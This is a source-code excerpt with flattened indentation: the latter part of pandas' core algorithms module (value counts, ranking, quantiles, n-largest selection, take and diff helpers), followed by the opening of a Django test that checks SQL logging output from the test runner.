uniques = uniques.to_array()
if sort and len(uniques) > 0:
from pandas.core.sorting import safe_sort
uniques, labels = safe_sort(uniques, labels, na_sentinel=na_sentinel,
assume_unique=True)
uniques = _reconstruct_data(uniques, dtype, original)
# return original tenor
if isinstance(original, ABCIndexClass):
uniques = original._shallow_copy(uniques, name=None)
elif isinstance(original, ABCSeries):
from pandas import Index
uniques = Index(uniques)
return labels, uniques
def value_counts(values, sort=True, ascending=False, normalize=False,
bins=None, dropna=True):
"""
Compute a histogram of the counts of non-null values.
Parameters
----------
values : ndarray (1-d)
sort : boolean, default True
Sort by values
ascending : boolean, default False
Sort in ascending order
normalize: boolean, default False
If True then compute a relative histogram
bins : integer, optional
Rather than count values, group them into half-open bins,
convenience for pd.cut, only works with numeric data
dropna : boolean, default True
Don't include counts of NaN
Returns
-------
value_counts : Series
"""
from pandas.core.series import Series, Index
name = getattr(values, 'name', None)
if bins is not None:
try:
from pandas.core.reshape.tile import cut
values = Series(values)
ii = cut(values, bins, include_lowest=True)
except TypeError:
raise TypeError("bins argument only works with numeric data.")
# count, remove nulls (from the index), and but the bins
result = ii.value_counts(dropna=dropna)
result = result[result.index.notna()]
result.index = result.index.astype('interval')
result = result.sort_index()
# if we are dropna and we have NO values
if dropna and (result.values == 0).all():
result = result.iloc[0:0]
# normalizing is by len of all (regardless of dropna)
counts = np.array([len(ii)])
else:
if is_categorical_dtype(values) or is_sparse(values):
# handle Categorical and sparse,
result = Series(values).values.value_counts(dropna=dropna)
result.name = name
counts = result.values
else:
keys, counts = _value_counts_arraylike(values, dropna)
if not isinstance(keys, Index):
keys = Index(keys)
result = Series(counts, index=keys, name=name)
if sort:
result = result.sort_values(ascending=ascending)
if normalize:
result = result / float(counts.sum())
return result
def _value_counts_arraylike(values, dropna):
"""
Parameters
----------
values : arraylike
dropna : boolean
Returns
-------
(uniques, counts)
"""
values = _ensure_arraylike(values)
original = values
values, dtype, ndtype = _ensure_data(values)
if needs_i8_conversion(dtype):
# i8
keys, counts = htable.value_count_int64(values, dropna)
if dropna:
msk = keys != iNaT
keys, counts = keys[msk], counts[msk]
else:
# ndarray like
# TODO: handle uint8
f = getattr(htable, "value_count_{dtype}".format(dtype=ndtype))
keys, counts = f(values, dropna)
mask = isna(values)
if not dropna and mask.any():
if not isna(keys).any():
keys = np.insert(keys, 0, np.NaN)
counts = np.insert(counts, 0, mask.sum())
keys = _reconstruct_data(keys, original.dtype, original)
return keys, counts
def duplicated(values, keep='first'):
"""
Return boolean ndarray denoting duplicate values.
.. versionadded:: 0.19.0
Parameters
----------
values : ndarray-like
Array over which to check for duplicate values.
keep : {'first', 'last', False}, default 'first'
- ``first`` : Mark duplicates as ``True`` except for the first
occurrence.
- ``last`` : Mark duplicates as ``True`` except for the last
occurrence.
- False : Mark all duplicates as ``True``.
Returns
-------
duplicated : ndarray
"""
values, dtype, ndtype = _ensure_data(values)
f = getattr(htable, "duplicated_{dtype}".format(dtype=ndtype))
return f(values, keep=keep)
def mode(values):
"""
Returns the mode(s) of an array.
Parameters
----------
values : array-like
Array over which to check for duplicate values.
Returns
-------
mode : Series
"""
from pandas import Series
values = _ensure_arraylike(values)
original = values
# categorical is a fast-path
if is_categorical_dtype(values):
if isinstance(values, Series):
return Series(values.values.mode(), name=values.name)
return values.mode()
values, dtype, ndtype = _ensure_data(values)
# TODO: this should support float64
if ndtype not in ['int64', 'uint64', 'object']:
ndtype = 'object'
values = _ensure_object(values)
f = getattr(htable, "mode_{dtype}".format(dtype=ndtype))
result = f(values)
try:
result = np.sort(result)
except TypeError as e:
warn("Unable to sort modes: %s" % e)
result = _reconstruct_data(result, original.dtype, original)
return Series(result)
def rank(values, axis=0, method='average', na_option='keep',
ascending=True, pct=False):
"""
Rank the values along a given axis.
Parameters
----------
values : array-like
Array whose values will be ranked. The number of dimensions in this
array must not exceed 2.
axis : int, default 0
Axis over which to perform rankings.
method : {'average', 'min', 'max', 'first', 'dense'}, default 'average'
The method by which tiebreaks are broken during the ranking.
na_option : {'keep', 'top'}, default 'keep'
The method by which NaNs are placed in the ranking.
- ``keep``: rank each NaN value with a NaN ranking
- ``top``: replace each NaN with either +/- inf so that they
there are ranked at the top
ascending : boolean, default True
Whether or not the elements should be ranked in ascending order.
pct : boolean, default False
Whether or not to the display the returned rankings in integer form
(e.g. 1, 2, 3) or in percentile form (e.g. 0.333..., 0.666..., 1).
"""
if values.ndim == 1:
f, values = _get_data_algo(values, _rank1d_functions)
ranks = f(values, ties_method=method, ascending=ascending,
na_option=na_option, pct=pct)
elif values.ndim == 2:
f, values = _get_data_algo(values, _rank2d_functions)
ranks = f(values, axis=axis, ties_method=method,
ascending=ascending, na_option=na_option, pct=pct)
else:
raise TypeError("Array with ndim > 2 are not supported.")
return ranks
def checked_add_with_arr(arr, b, arr_mask=None, b_mask=None):
"""
Perform array addition that checks for underflow and overflow.
Performs the addition of an int64 array and an int64 integer (or array)
but checks that they do not result in overflow first. For elements that
are indicated to be NaN, whether or not there is overflow for that element
is automatically ignored.
Parameters
----------
arr : array addend.
b : array or scalar addend.
arr_mask : boolean array or None
array indicating which elements to exclude from checking
b_mask : boolean array or boolean or None
array or scalar indicating which element(s) to exclude from checking
Returns
-------
sum : An array for elements x + b for each element x in arr if b is
a scalar or an array for elements x + y for each element pair
(x, y) in (arr, b).
Raises
------
OverflowError if any x + y exceeds the maximum or minimum int64 value.
"""
def _broadcast(arr_or_scalar, shape):
"""
Helper function to broadcast arrays / scalars to the desired shape.
"""
if _np_version_under1p10:
if lib.isscalar(arr_or_scalar):
out = np.empty(shape)
out.fill(arr_or_scalar)
else:
out = arr_or_scalar
else:
out = np.broadcast_to(arr_or_scalar, shape)
return out
# For performance reasons, we broadcast 'b' to the new array 'b2'
# so that it has the same size as 'arr'.
b2 = _broadcast(b, arr.shape)
if b_mask is not None:
# We do the same broadcasting for b_mask as well.
b2_mask = _broadcast(b_mask, arr.shape)
else:
b2_mask = None
# For elements that are NaN, regardless of their value, we should
# ignore whether they overflow or not when doing the checked add.
if arr_mask is not None and b2_mask is not None:
not_nan = np.logical_not(arr_mask | b2_mask)
elif arr_mask is not None:
not_nan = np.logical_not(arr_mask)
elif b_mask is not None:
not_nan = np.logical_not(b2_mask)
else:
not_nan = np.empty(arr.shape, dtype=bool)
not_nan.fill(True)
# gh-14324: For each element in 'arr' and its corresponding element
# in 'b2', we check the sign of the element in 'b2'. If it is positive,
# we then check whether its sum with the element in 'arr' exceeds
# np.iinfo(np.int64).max. If so, we have an overflow error. If it
# it is negative, we then check whether its sum with the element in
# 'arr' exceeds np.iinfo(np.int64).min. If so, we have an overflow
# error as well.
mask1 = b2 > 0
mask2 = b2 < 0
if not mask1.any():
to_raise = ((np.iinfo(np.int64).min - b2 > arr) & not_nan).any()
elif not mask2.any():
to_raise = ((np.iinfo(np.int64).max - b2 < arr) & not_nan).any()
else:
to_raise = (((np.iinfo(np.int64).max -
b2[mask1] < arr[mask1]) & not_nan[mask1]).any() or
((np.iinfo(np.int64).min -
b2[mask2] > arr[mask2]) & not_nan[mask2]).any())
if to_raise:
raise OverflowError("Overflow in int64 addition")
return arr + b
_rank1d_functions = {
'float64': algos.rank_1d_float64,
'int64': algos.rank_1d_int64,
'uint64': algos.rank_1d_uint64,
'object': algos.rank_1d_object
}
_rank2d_functions = {
'float64': algos.rank_2d_float64,
'int64': algos.rank_2d_int64,
'uint64': algos.rank_2d_uint64,
'object': algos.rank_2d_object
}
def quantile(x, q, interpolation_method='fraction'):
"""
Compute sample quantile or quantiles of the input array. For example, q=0.5
computes the median.
The `interpolation_method` parameter supports three values, namely
`fraction` (default), `lower` and `higher`. Interpolation is done only,
if the desired quantile lies between two data points `i` and `j`. For
`fraction`, the result is an interpolated value between `i` and `j`;
for `lower`, the result is `i`, for `higher` the result is `j`.
Parameters
----------
x : ndarray
Values from which to extract score.
q : scalar or array
Percentile at which to extract score.
interpolation_method : {'fraction', 'lower', 'higher'}, optional
This optional parameter specifies the interpolation method to use,
when the desired quantile lies between two data points `i` and `j`:
- fraction: `i + (j - i)*fraction`, where `fraction` is the
fractional part of the index surrounded by `i` and `j`.
-lower: `i`.
- higher: `j`.
Returns
-------
score : float
Score at percentile.
Examples
--------
>>> from scipy import stats
>>> a = np.arange(100)
>>> stats.scoreatpercentile(a, 50)
49.5
"""
x = np.asarray(x)
mask = isna(x)
x = x[~mask]
values = np.sort(x)
def _interpolate(a, b, fraction):
"""Returns the point at the given fraction between a and b, where
'fraction' must be between 0 and 1.
"""
return a + (b - a) * fraction
def _get_score(at):
if len(values) == 0:
return np.nan
idx = at * (len(values) - 1)
if idx % 1 == 0:
score = values[int(idx)]
else:
if interpolation_method == 'fraction':
score = _interpolate(values[int(idx)], values[int(idx) + 1],
idx % 1)
elif interpolation_method == 'lower':
score = values[np.floor(idx)]
elif interpolation_method == 'higher':
score = values[np.ceil(idx)]
else:
raise ValueError("interpolation_method can only be 'fraction' "
", 'lower' or 'higher'")
return score
if is_scalar(q):
return _get_score(q)
else:
q = np.asarray(q, np.float64)
return algos.arrmap_float64(q, _get_score)
# --------------- #
# select n #
# --------------- #
class SelectN(object):
def __init__(self, obj, n, keep):
self.obj = obj
self.n = n
self.keep = keep
if self.keep not in ('first', 'last'):
raise ValueError('keep must be either "first", "last"')
def nlargest(self):
return self.compute('nlargest')
def nsmallest(self):
return self.compute('nsmallest')
@staticmethod
def is_valid_dtype_n_method(dtype):
"""
Helper function to determine if dtype is valid for
nsmallest/nlargest methods
"""
return ((is_numeric_dtype(dtype) and not is_complex_dtype(dtype)) or
needs_i8_conversion(dtype))
class SelectNSeries(SelectN):
"""
Implement n largest/smallest for Series
Parameters
----------
obj : Series
n : int
keep : {'first', 'last'}, default 'first'
Returns
-------
nordered : Series
"""
def compute(self, method):
n = self.n
dtype = self.obj.dtype
if not self.is_valid_dtype_n_method(dtype):
raise TypeError("Cannot use method '{method}' with "
"dtype {dtype}".format(method=method,
dtype=dtype))
if n <= 0:
return self.obj[[]]
dropped = self.obj.dropna()
# slow method
if n >= len(self.obj):
reverse_it = (self.keep == 'last' or method == 'nlargest')
ascending = method == 'nsmallest'
slc = np.s_[::-1] if reverse_it else np.s_[:]
return dropped[slc].sort_values(ascending=ascending).head(n)
# fast method
arr, _, _ = _ensure_data(dropped.values)
if method == 'nlargest':
arr = -arr
if self.keep == 'last':
arr = arr[::-1]
narr = len(arr)
n = min(n, narr)
kth_val = algos.kth_smallest(arr.copy(), n - 1)
ns, = np.nonzero(arr <= kth_val)
inds = ns[arr[ns].argsort(kind='mergesort')][:n]
if self.keep == 'last':
# reverse indices
inds = narr - 1 - inds
return dropped.iloc[inds]
class SelectNFrame(SelectN):
"""
Implement n largest/smallest for DataFrame
Parameters
----------
obj : DataFrame
n : int
keep : {'first', 'last'}, default 'first'
columns : list or str
Returns
-------
nordered : DataFrame
"""
def __init__(self, obj, n, keep, columns):
super(SelectNFrame, self).__init__(obj, n, keep)
if not is_list_like(columns):
columns = [columns]
columns = list(columns)
self.columns = columns
def compute(self, method):
from pandas import Int64Index
n = self.n
frame = self.obj
columns = self.columns
for column in columns:
dtype = frame[column].dtype
if not self.is_valid_dtype_n_method(dtype):
raise TypeError((
"Column {column!r} has dtype {dtype}, cannot use method "
"{method!r} with this dtype"
).format(column=column, dtype=dtype, method=method))
def get_indexer(current_indexer, other_indexer):
"""Helper function to concat `current_indexer` and `other_indexer`
depending on `method`
"""
if method == 'nsmallest':
return current_indexer.append(other_indexer)
else:
return other_indexer.append(current_indexer)
# Below we save and reset the index in case index contains duplicates
original_index = frame.index
cur_frame = frame = frame.reset_index(drop=True)
cur_n = n
indexer = Int64Index([])
for i, column in enumerate(columns):
# For each column we apply method to cur_frame[column].
# If it is the last column in columns, or if the values
# returned are unique in frame[column] we save this index
# and break
# Otherwise we must save the index of the non duplicated values
# and set the next cur_frame to cur_frame filtered on all
# duplcicated values (#GH15297)
series = cur_frame[column]
values = getattr(series, method)(cur_n, keep=self.keep)
is_last_column = len(columns) - 1 == i
if is_last_column or values.nunique() == series.isin(values).sum():
# Last column in columns or values are unique in
# series => values
# is all that matters
indexer = get_indexer(indexer, values.index)
break
duplicated_filter = series.duplicated(keep=False)
duplicated = values[duplicated_filter]
non_duplicated = values[~duplicated_filter]
indexer = get_indexer(indexer, non_duplicated.index)
# Must set cur frame to include all duplicated values
# to consider for the next column, we also can reduce
# cur_n by the current length of the indexer
cur_frame = cur_frame[series.isin(duplicated)]
cur_n = n - len(indexer)
frame = frame.take(indexer)
# Restore the index on frame
frame.index = original_index.take(indexer)
return frame
# ------- ## ---- #
# take #
# ---- #
def _view_wrapper(f, arr_dtype=None, out_dtype=None, fill_wrap=None):
def wrapper(arr, indexer, out, fill_value=np.nan):
if arr_dtype is not None:
arr = arr.view(arr_dtype)
if out_dtype is not None:
out = out.view(out_dtype)
if fill_wrap is not None:
fill_value = fill_wrap(fill_value)
f(arr, indexer, out, fill_value=fill_value)
return wrapper
def _convert_wrapper(f, conv_dtype):
def wrapper(arr, indexer, out, fill_value=np.nan):
arr = arr.astype(conv_dtype)
f(arr, indexer, out, fill_value=fill_value)
return wrapper
def _take_2d_multi_object(arr, indexer, out, fill_value, mask_info):
# this is not ideal, performance-wise, but it's better than raising
# an exception (best to optimize in Cython to avoid getting here)
row_idx, col_idx = indexer
if mask_info is not None:
(row_mask, col_mask), (row_needs, col_needs) = mask_info
else:
row_mask = row_idx == -1
col_mask = col_idx == -1
row_needs = row_mask.any()
col_needs = col_mask.any()
if fill_value is not None:
if row_needs:
out[row_mask, :] = fill_value
if col_needs:
out[:, col_mask] = fill_value
for i in range(len(row_idx)):
u_ = row_idx[i]
for j in range(len(col_idx)):
v = col_idx[j]
out[i, j] = arr[u_, v]
def _take_nd_object(arr, indexer, out, axis, fill_value, mask_info):
if mask_info is not None:
mask, needs_masking = mask_info
else:
mask = indexer == -1
needs_masking = mask.any()
if arr.dtype != out.dtype:
arr = arr.astype(out.dtype)
if arr.shape[axis] > 0:
arr.take(_ensure_platform_int(indexer), axis=axis, out=out)
if needs_masking:
outindexer = [slice(None)] * arr.ndim
outindexer[axis] = mask
out[tuple(outindexer)] = fill_value
_take_1d_dict = {
('int8', 'int8'): algos.take_1d_int8_int8,
('int8', 'int32'): algos.take_1d_int8_int32,
('int8', 'int64'): algos.take_1d_int8_int64,
('int8', 'float64'): algos.take_1d_int8_float64,
('int16', 'int16'): algos.take_1d_int16_int16,
('int16', 'int32'): algos.take_1d_int16_int32,
('int16', 'int64'): algos.take_1d_int16_int64,
('int16', 'float64'): algos.take_1d_int16_float64,
('int32', 'int32'): algos.take_1d_int32_int32,
('int32', 'int64'): algos.take_1d_int32_int64,
('int32', 'float64'): algos.take_1d_int32_float64,
('int64', 'int64'): algos.take_1d_int64_int64,
('int64', 'float64'): algos.take_1d_int64_float64,
('float32', 'float32'): algos.take_1d_float32_float32,
('float32', 'float64'): algos.take_1d_float32_float64,
('float64', 'float64'): algos.take_1d_float64_float64,
('object', 'object'): algos.take_1d_object_object,
('bool', 'bool'): _view_wrapper(algos.take_1d_bool_bool, np.uint8,
np.uint8),
('bool', 'object'): _view_wrapper(algos.take_1d_bool_object, np.uint8,
None),
('datetime64[ns]', 'datetime64[ns]'): _view_wrapper(
algos.take_1d_int64_int64, np.int64, np.int64, np.int64)
}
_take_2d_axis0_dict = {
('int8', 'int8'): algos.take_2d_axis0_int8_int8,
('int8', 'int32'): algos.take_2d_axis0_int8_int32,
('int8', 'int64'): algos.take_2d_axis0_int8_int64,
('int8', 'float64'): algos.take_2d_axis0_int8_float64,
('int16', 'int16'): algos.take_2d_axis0_int16_int16,
('int16', 'int32'): algos.take_2d_axis0_int16_int32,
('int16', 'int64'): algos.take_2d_axis0_int16_int64,
('int16', 'float64'): algos.take_2d_axis0_int16_float64,
('int32', 'int32'): algos.take_2d_axis0_int32_int32,
('int32', 'int64'): algos.take_2d_axis0_int32_int64,
('int32', 'float64'): algos.take_2d_axis0_int32_float64,
('int64', 'int64'): algos.take_2d_axis0_int64_int64,
('int64', 'float64'): algos.take_2d_axis0_int64_float64,
('float32', 'float32'): algos.take_2d_axis0_float32_float32,
('float32', 'float64'): algos.take_2d_axis0_float32_float64,
('float64', 'float64'): algos.take_2d_axis0_float64_float64,
('object', 'object'): algos.take_2d_axis0_object_object,
('bool', 'bool'): _view_wrapper(algos.take_2d_axis0_bool_bool, np.uint8,
np.uint8),
('bool', 'object'): _view_wrapper(algos.take_2d_axis0_bool_object,
np.uint8, None),
('datetime64[ns]', 'datetime64[ns]'):
_view_wrapper(algos.take_2d_axis0_int64_int64, np.int64, np.int64,
fill_wrap=np.int64)
}
_take_2d_axis1_dict = {
('int8', 'int8'): algos.take_2d_axis1_int8_int8,
('int8', 'int32'): algos.take_2d_axis1_int8_int32,
('int8', 'int64'): algos.take_2d_axis1_int8_int64,
('int8', 'float64'): algos.take_2d_axis1_int8_float64,
('int16', 'int16'): algos.take_2d_axis1_int16_int16,
('int16', 'int32'): algos.take_2d_axis1_int16_int32,
('int16', 'int64'): algos.take_2d_axis1_int16_int64,
('int16', 'float64'): algos.take_2d_axis1_int16_float64,
('int32', 'int32'): algos.take_2d_axis1_int32_int32,
('int32', 'int64'): algos.take_2d_axis1_int32_int64,
('int32', 'float64'): algos.take_2d_axis1_int32_float64,
('int64', 'int64'): algos.take_2d_axis1_int64_int64,
('int64', 'float64'): algos.take_2d_axis1_int64_float64,
('float32', 'float32'): algos.take_2d_axis1_float32_float32,
('float32', 'float64'): algos.take_2d_axis1_float32_float64,
('float64', 'float64'): algos.take_2d_axis1_float64_float64,
('object', 'object'): algos.take_2d_axis1_object_object,
('bool', 'bool'): _view_wrapper(algos.take_2d_axis1_bool_bool, np.uint8,
np.uint8),
('bool', 'object'): _view_wrapper(algos.take_2d_axis1_bool_object,
np.uint8, None),
('datetime64[ns]', 'datetime64[ns]'):
_view_wrapper(algos.take_2d_axis1_int64_int64, np.int64, np.int64,
fill_wrap=np.int64)
}
_take_2d_multi_dict = {
('int8', 'int8'): algos.take_2d_multi_int8_int8,
('int8', 'int32'): algos.take_2d_multi_int8_int32,
('int8', 'int64'): algos.take_2d_multi_int8_int64,
('int8', 'float64'): algos.take_2d_multi_int8_float64,
('int16', 'int16'): algos.take_2d_multi_int16_int16,
('int16', 'int32'): algos.take_2d_multi_int16_int32,
('int16', 'int64'): algos.take_2d_multi_int16_int64,
('int16', 'float64'): algos.take_2d_multi_int16_float64,
('int32', 'int32'): algos.take_2d_multi_int32_int32,
('int32', 'int64'): algos.take_2d_multi_int32_int64,
('int32', 'float64'): algos.take_2d_multi_int32_float64,
('int64', 'int64'): algos.take_2d_multi_int64_int64,
('int64', 'float64'): algos.take_2d_multi_int64_float64,
('float32', 'float32'): algos.take_2d_multi_float32_float32,
('float32', 'float64'): algos.take_2d_multi_float32_float64,
('float64', 'float64'): algos.take_2d_multi_float64_float64,
('object', 'object'): algos.take_2d_multi_object_object,
('bool', 'bool'): _view_wrapper(algos.take_2d_multi_bool_bool, np.uint8,
np.uint8),
('bool', 'object'): _view_wrapper(algos.take_2d_multi_bool_object,
np.uint8, None),
('datetime64[ns]', 'datetime64[ns]'):
_view_wrapper(algos.take_2d_multi_int64_int64, np.int64, np.int64,
fill_wrap=np.int64)
}
def _get_take_nd_function(ndim, arr_dtype, out_dtype, axis=0, mask_info=None):
if ndim <= 2:
tup = (arr_dtype.name, out_dtype.name)
if ndim == 1:
func = _take_1d_dict.get(tup, None)
elif ndim == 2:
if axis == 0:
func = _take_2d_axis0_dict.get(tup, None)
else:
func = _take_2d_axis1_dict.get(tup, None)
if func is not None:
return func
tup = (out_dtype.name, out_dtype.name)
if ndim == 1:
func = _take_1d_dict.get(tup, None)
elif ndim == 2:
if axis == 0:
func = _take_2d_axis0_dict.get(tup, None)
else:
func = _take_2d_axis1_dict.get(tup, None)
if func is not None:
func = _convert_wrapper(func, out_dtype)
return func
def func(arr, indexer, out, fill_value=np.nan):
indexer = _ensure_int64(indexer)
_take_nd_object(arr, indexer, out, axis=axis, fill_value=fill_value,
mask_info=mask_info)
return func
def take_nd(arr, indexer, axis=0, out=None, fill_value=np.nan, mask_info=None,
allow_fill=True):
"""
Specialized Cython take which sets NaN values in one pass
Parameters
----------
arr : ndarray
Input array
indexer : ndarray
1-D array of indices to take, subarrays corresponding to -1 value
indicies are filed with fill_value
axis : int, default 0
Axis to take from
out : ndarray or None, default None
Optional output array, must be appropriate type to hold input and
fill_value together, if indexer has any -1 value entries; call
_maybe_promote to determine this type for any fill_value
fill_value : any, default np.nan
Fill value to replace -1 values with
mask_info : tuple of (ndarray, boolean)
If provided, value should correspond to:
(indexer != -1, (indexer != -1).any())
If not provided, it will be computed internally if necessary
allow_fill : boolean, default True
If False, indexer is assumed to contain no -1 values so no filling
will be done. This short-circuits computation of a mask. Result is
undefined if allow_fill == False and -1 is present in indexer.
"""
# dispatch to internal type takes
if is_categorical(arr):
return arr.take_nd(indexer, fill_value=fill_value,
allow_fill=allow_fill)
elif is_datetimetz(arr):
return arr.take(indexer, fill_value=fill_value, allow_fill=allow_fill)
elif is_interval_dtype(arr):
return arr.take(indexer, fill_value=fill_value, allow_fill=allow_fill)
if indexer is None:
indexer = np.arange(arr.shape[axis], dtype=np.int64)
dtype, fill_value = arr.dtype, arr.dtype.type()
else:
indexer = _ensure_int64(indexer, copy=False)
if not allow_fill:
dtype, fill_value = arr.dtype, arr.dtype.type()
mask_info = None, False
else:
# check for promotion based on types only (do this first because
# it's faster than computing a mask)
dtype, fill_value = maybe_promote(arr.dtype, fill_value)
if dtype != arr.dtype and (out is None or out.dtype != dtype):
# check if promotion is actually required based on indexer
if mask_info is not None:
mask, needs_masking = mask_info
else:
mask = indexer == -1
needs_masking = mask.any()
mask_info = mask, needs_masking
if needs_masking:
if out is not None and out.dtype != dtype:
raise TypeError('Incompatible type for fill_value')
else:
# if not, then depromote, set fill_value to dummy
# (it won't be used but we don't want the cython code
# to crash when trying to cast it to dtype)
dtype, fill_value = arr.dtype, arr.dtype.type()
flip_order = False
if arr.ndim == 2:
if arr.flags.f_contiguous:
flip_order = True
if flip_order:
arr = arr.T
axis = arr.ndim - axis - 1
if out is not None:
out = out.T
# at this point, it's guaranteed that dtype can hold both the arr values
# and the fill_value
if out is None:
out_shape = list(arr.shape)
out_shape[axis] = len(indexer)
out_shape = tuple(out_shape)
if arr.flags.f_contiguous and axis == arr.ndim - 1:
# minor tweak that can make an order-of-magnitude difference
# for dataframes initialized directly from 2-d ndarrays
# (s.t. df.values is c-contiguous and df._data.blocks[0] is its
# f-contiguous transpose)
out = np.empty(out_shape, dtype=dtype, order='F')
else:
out = np.empty(out_shape, dtype=dtype)
func = _get_take_nd_function(arr.ndim, arr.dtype, out.dtype, axis=axis,
mask_info=mask_info)
func(arr, indexer, out, fill_value)
if flip_order:
out = out.T
return out
take_1d = take_nd
def take_2d_multi(arr, indexer, out=None, fill_value=np.nan, mask_info=None,
allow_fill=True):
"""
Specialized Cython take which sets NaN values in one pass
"""
if indexer is None or (indexer[0] is None and indexer[1] is None):
row_idx = np.arange(arr.shape[0], dtype=np.int64)
col_idx = np.arange(arr.shape[1], dtype=np.int64)
indexer = row_idx, col_idx
dtype, fill_value = arr.dtype, arr.dtype.type()
else:
row_idx, col_idx = indexer
if row_idx is None:
row_idx = np.arange(arr.shape[0], dtype=np.int64)
else:
row_idx = _ensure_int64(row_idx)
if col_idx is None:
col_idx = np.arange(arr.shape[1], dtype=np.int64)
else:
col_idx = _ensure_int64(col_idx)
indexer = row_idx, col_idx
if not allow_fill:
dtype, fill_value = arr.dtype, arr.dtype.type()
mask_info = None, False
else:
# check for promotion based on types only (do this first because
# it's faster than computing a mask)
dtype, fill_value = maybe_promote(arr.dtype, fill_value)
if dtype != arr.dtype and (out is None or out.dtype != dtype):
# check if promotion is actually required based on indexer
if mask_info is not None:
(row_mask, col_mask), (row_needs, col_needs) = mask_info
else:
row_mask = row_idx == -1
col_mask = col_idx == -1
row_needs = row_mask.any()
col_needs = col_mask.any()
mask_info = (row_mask, col_mask), (row_needs, col_needs)
if row_needs or col_needs:
if out is not None and out.dtype != dtype:
raise TypeError('Incompatible type for fill_value')
else:
# if not, then depromote, set fill_value to dummy
# (it won't be used but we don't want the cython code
# to crash when trying to cast it to dtype)
dtype, fill_value = arr.dtype, arr.dtype.type()
# at this point, it's guaranteed that dtype can hold both the arr values
# and the fill_value
if out is None:
out_shape = len(row_idx), len(col_idx)
out = np.empty(out_shape, dtype=dtype)
func = _take_2d_multi_dict.get((arr.dtype.name, out.dtype.name), None)
if func is None and arr.dtype != out.dtype:
func = _take_2d_multi_dict.get((out.dtype.name, out.dtype.name), None)
if func is not None:
func = _convert_wrapper(func, out.dtype)
if func is None:
def func(arr, indexer, out, fill_value=np.nan):
_take_2d_multi_object(arr, indexer, out, fill_value=fill_value,
mask_info=mask_info)
func(arr, indexer, out=out, fill_value=fill_value)
return out
# ---- #
# diff #
# ---- #
_diff_special = {
'float64': algos.diff_2d_float64,
'float32': algos.diff_2d_float32,
'int64': algos.diff_2d_int64,
'int32': algos.diff_2d_int32,
'int16': algos.diff_2d_int16,
'int8': algos.diff_2d_int8,
}
def diff(arr, n, axis=0):
"""
difference of n between self,
analagoust to s-s.shift(n)
Parameters
----------
arr : ndarray
n : int
number of periods
axis : int
axis to shift on
Returns
-------
shifted
"""
n = int(n)
na = np.nan
dtype = arr.dtype
is_timedelta = False
if needs_i8_conversion(arr):
dtype = np.float64
arr = arr.view('i8')
na = iNaT
is_timedelta = True
elif is_bool_dtype(dtype):
dtype = np.object_
elif is_integer_dtype(dtype):
dtype = np.float64
dtype = np.dtype(dtype)
out_arr = np.empty(arr.shape, dtype=dtype)
na_indexer = [slice(None)] * arr.ndim
na_indexer[axis] = slice(None, n) if n >= 0 else slice(n, None)
out_arr[tuple(na_indexer)] = na
if arr.ndim == 2 and arr.dtype.name in _diff_special:
f = _diff_special[arr.dtype.name]
f(arr, out_arr, n, axis)
else:
res_indexer = [slice(None)] * arr.ndim
res_indexer[axis] = slice(n, None) if n >= 0 else slice(None, n)
res_indexer = tuple(res_indexer)
lag_indexer = [slice(None)] * arr.ndim
lag_indexer[axis] = slice(None, -n) if n > 0 else slice(-n, None)
lag_indexer = tuple(lag_indexer)
# need to make sure that we account for na for datelike/timedelta
# we don't actually want to subtract these i8 numbers
if is_timedelta:
res = arr[res_indexer]
lag = arr[lag_indexer]
mask = (arr[res_indexer] == na) | (arr[lag_indexer] == na)
if mask.any():
res = res.copy()
res[mask] = 0
lag = lag.copy()
lag[mask] = 0
result = res - lag
result[mask] = na
out_arr[res_indexer] = result
else:
out_arr[res_indexer] = arr[res_indexer] - arr[lag_indexer]
if is_timedelta:
from pandas import TimedeltaIndex
out_arr = TimedeltaIndex(out_arr.ravel().astype('int64')).asi8.reshape(
out_arr.shape).astype('timedelta64[ns]')
return out_arr
| bsd-3-clause |
weiawe/django | tests/test_runner/test_debug_sql.py | 210 | 4048 | import sys
import unittest
from django.db import connection
from django.test import TestCase
from django.test.runner import DiscoverRunner
from django.utils import six
from django.utils.encoding import force_text
from .models import Person
@unittest.skipUnless(connection.vendor == 'sqlite', 'Only run on sqlite so we can check output SQL.')
class TestDebugSQL(unittest.TestCase):
class PassingTest(TestCase):
def runTest(self):
Person.objects.filter(first_name='pass').count()
class FailingTest(TestCase):
def runTest(self):
Person.objects.filter(first_name='fail').count()
self.fail()
class ErrorTest(TestCase):
def runTest(self):
Person.objects.filter(first_name='error').count()
raise Exception
def _test_output(self, verbosity):
runner = DiscoverRunner(debug_sql=True, verbosity=0)
suite = runner.test_suite()
suite.addTest(self.FailingTest())
suite.addTest(self.ErrorTest())
suite.addTest(self.PassingTest())
old_config = runner.setup_databases()
stream = six.StringIO()
resultclass = runner.get_resultclass()
runner.test_runner(
verbosity=verbosity,
stream=stream,
resultclass=resultclass,
).run(suite)
runner.teardown_databases(old_config)
if six.PY2:
stream.buflist = [force_text(x) for x in stream.buflist]
return stream.getvalue()
def test_output_normal(self):
full_output = self._test_output(1)
for output in self.expected_outputs:
self.assertIn(output, full_output)
for output in self.verbose_expected_outputs:
self.assertNotIn(output, full_output)
def test_output_verbose(self):
full_output = self._test_output(2)
for output in self.expected_outputs:
self.assertIn(output, full_output)
for output in self.verbose_expected_outputs:
self.assertIn(output, full_output)
if six.PY3:
expected_outputs = [
('''QUERY = 'SELECT COUNT(%s) AS "__count" '''
'''FROM "test_runner_person" WHERE '''
'''"test_runner_person"."first_name" = %s' '''
'''- PARAMS = ('*', 'error');'''),
('''QUERY = 'SELECT COUNT(%s) AS "__count" '''
'''FROM "test_runner_person" WHERE '''
'''"test_runner_person"."first_name" = %s' '''
'''- PARAMS = ('*', 'fail');'''),
]
else:
expected_outputs = [
('''QUERY = u'SELECT COUNT(%s) AS "__count" '''
'''FROM "test_runner_person" WHERE '''
'''"test_runner_person"."first_name" = %s' '''
'''- PARAMS = (u'*', u'error');'''),
('''QUERY = u'SELECT COUNT(%s) AS "__count" '''
'''FROM "test_runner_person" WHERE '''
'''"test_runner_person"."first_name" = %s' '''
'''- PARAMS = (u'*', u'fail');'''),
]
verbose_expected_outputs = [
# Output format changed in Python 3.5+
x.format('' if sys.version_info < (3, 5) else 'TestDebugSQL.') for x in [
'runTest (test_runner.test_debug_sql.{}FailingTest) ... FAIL',
'runTest (test_runner.test_debug_sql.{}ErrorTest) ... ERROR',
'runTest (test_runner.test_debug_sql.{}PassingTest) ... ok',
]
]
if six.PY3:
verbose_expected_outputs += [
('''QUERY = 'SELECT COUNT(%s) AS "__count" '''
'''FROM "test_runner_person" WHERE '''
'''"test_runner_person"."first_name" = %s' '''
